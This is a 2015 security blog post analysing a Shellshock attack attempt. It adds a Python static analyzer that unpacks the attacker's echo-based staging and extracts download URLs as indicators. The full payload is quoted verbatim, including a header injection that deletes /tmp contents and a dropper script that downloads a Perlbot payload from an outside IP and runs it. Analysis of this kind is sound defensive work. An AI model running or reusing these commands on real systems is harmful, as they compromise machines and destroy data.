Tuesday, March 17, 2015

Shellshock Deception with echo

I thought this Shellshock attempt by China.Z was a bit different than what I'd seen before and worth discussing quickly.

() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo echo By China.Z >> /tmp/key.sh;echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo rm -rf /tmp/key.sh >> /tmp/key.sh;chmod 755 /tmp/key.sh;/tmp/key.sh"

Below I've provided some analysis of what is occurring on each line.
  • /bin/bash -c "rm -rf /tmp/*;

    Delete all content from the temp folder.
  • echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Start building a key.sh file that will run the malicious code. Its first line is the wget download of my evil payload (Perlbot) into the Kinas file.
  • echo echo By China.Z >> /tmp/key.sh;

    Next append to the Key file a command that simply prints my evil handle name.
  • echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Then append to the Key file a command that changes the permissions of my payload Kinas file to executable.
  • echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Then append to the Key file a command that runs the evil Kinas payload file.
  • echo rm -rf /tmp/key.sh >> /tmp/key.sh;

    Then append to the key file a command that deletes all content from the temp folder to clean up after themselves.
  • chmod 755 /tmp/key.sh;

    Then change the permissions on the key file to executable.
  • /tmp/key.sh;

    Then run my malicious Key file.


The final result is a file /tmp/key.sh that contains the following code, which is then executed:

wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl.
echo By China.Z
chmod 755 /tmp/Kinas.X-brxl.
/tmp/Kinas.X-brxl.
rm -rf /tmp/key.sh
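
A defender can see through this trick mechanically by replaying the echo redirections statically instead of executing anything. The Python analyzer below is an added example, not code from the original post or from anyone associated with China.Z: it checks for the Shellshock function-definition prefix, unwraps the string handed to bash -c, emulates each `echo ... >> file` (and `echo ... > file`, which this sample does not use) into an in-memory file map, and reports the reconstructed staged script together with any URLs as download IoCs. The function names and the split-on-semicolon simplification are my own assumptions; the sample payload is the one quoted above, embedded as a string.

```python
import re
import shlex

# Constructed sample input: the Shellshock payload quoted in this post, written
# out as a Python string so the analyzer can run offline.
SAMPLE_PAYLOAD = (
    '() { :; }; /bin/bash -c "rm -rf /tmp/*;'
    'echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;'
    'echo echo By China.Z >> /tmp/key.sh;'
    'echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;'
    'echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;'
    'echo rm -rf /tmp/key.sh >> /tmp/key.sh;'
    'chmod 755 /tmp/key.sh;/tmp/key.sh"'
)

# Shellshock prefix "() { :; };" : a bogus function definition followed by the
# trailing command that a vulnerable bash executes while importing the variable.
SHELLSHOCK_PREFIX = re.compile(r'^\(\)\s*\{\s*:\s*;\s*\}\s*;')
# "echo <words> >> <path>" (append) or "echo <words> > <path>" (truncate)
ECHO_REDIRECT = re.compile(r'^echo\s+(?P<body>.*?)\s*(?P<op>>>?)\s*(?P<path>\S+)$')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')


def is_shellshock(value):
    """True if the header/variable value starts with the Shellshock prefix."""
    return bool(SHELLSHOCK_PREFIX.match(value.strip()))


def trailing_command(value):
    """Return the command text that follows the bogus function definition."""
    stripped = value.strip()
    m = SHELLSHOCK_PREFIX.match(stripped)
    return stripped[m.end():].strip() if m else stripped


def unwrap_bash_c(cmd):
    """If cmd is `<path>/bash -c "<script>"` (or sh -c), return <script>; else cmd."""
    try:
        tokens = shlex.split(cmd)  # handles the double-quoted script as one token
    except ValueError:
        return cmd
    if (len(tokens) >= 3 and tokens[0].rsplit('/', 1)[-1] in ('bash', 'sh')
            and tokens[1] == '-c'):
        return tokens[2]
    return cmd


def emulate_echo_staging(script):
    """Statically replay `echo ... >> file` commands without executing anything.

    Returns (direct_commands, staged_files): the commands that would run
    directly, and a dict of path -> list of lines the echo chain writes there.
    Splitting on ';' is enough for this payload; a ';' inside quotes would
    need a real shell parser (assumption, kept simple on purpose).
    """
    direct, files = [], {}
    for raw in script.split(';'):
        cmd = raw.strip()
        if not cmd:
            continue
        m = ECHO_REDIRECT.match(cmd)
        if not m:
            direct.append(cmd)
            continue
        line = ' '.join(m.group('body').split())  # echo joins args with single spaces
        path = m.group('path')
        if m.group('op') == '>':
            files[path] = [line]                    # '>' truncates the file first
        else:
            files.setdefault(path, []).append(line)  # '>>' appends
    return direct, files


def analyze(value):
    """Full static analysis of one suspected Shellshock value."""
    script = unwrap_bash_c(trailing_command(value))
    direct, files = emulate_echo_staging(script)
    return {"shellshock": is_shellshock(value), "direct_commands": direct,
            "staged_files": files, "urls": sorted(set(URL_RE.findall(value)))}


def report(value):
    """Human-readable summary: what runs directly, and what the echos really build."""
    r = analyze(value)
    out = [f"shellshock prefix present: {r['shellshock']}", "commands run directly:"]
    out += [f"  {c}" for c in r["direct_commands"]]
    for path, lines in r["staged_files"].items():
        out.append(f"reconstructed {path} (written by the echo chain):")
        out += [f"  {line}" for line in lines]
    out.append("download URLs (IoCs): " + ", ".join(r["urls"]))
    return "\n".join(out)


if __name__ == "__main__":
    print(report(SAMPLE_PAYLOAD))
```

Run against the sample, the report shows that only three commands execute directly (the rm, the chmod, and /tmp/key.sh itself) while the five echos assemble the real dropper script, which is exactly the point a quick glance at the echos hides. The same routine works on a value pulled from a web log's User-Agent or other header field.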


WHY GO THROUGH ALL THIS EFFORT? Why did China.Z choose to spit everything into a "key" file before finally running that key file? My best guess is deception. Non-Linux-savvy IT staff may look at the code above at first glance and assume that it is a bunch of harmless echos, basically a proof-of-concept attempt saying 'if I were evil, I'd be able to own you ... but I just did some echos, so I'm a friendly'. But if you look closer, per my analysis, you'll see that the echos are actually used to deliver the payload and infect the machine.

Keep on monitoring!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
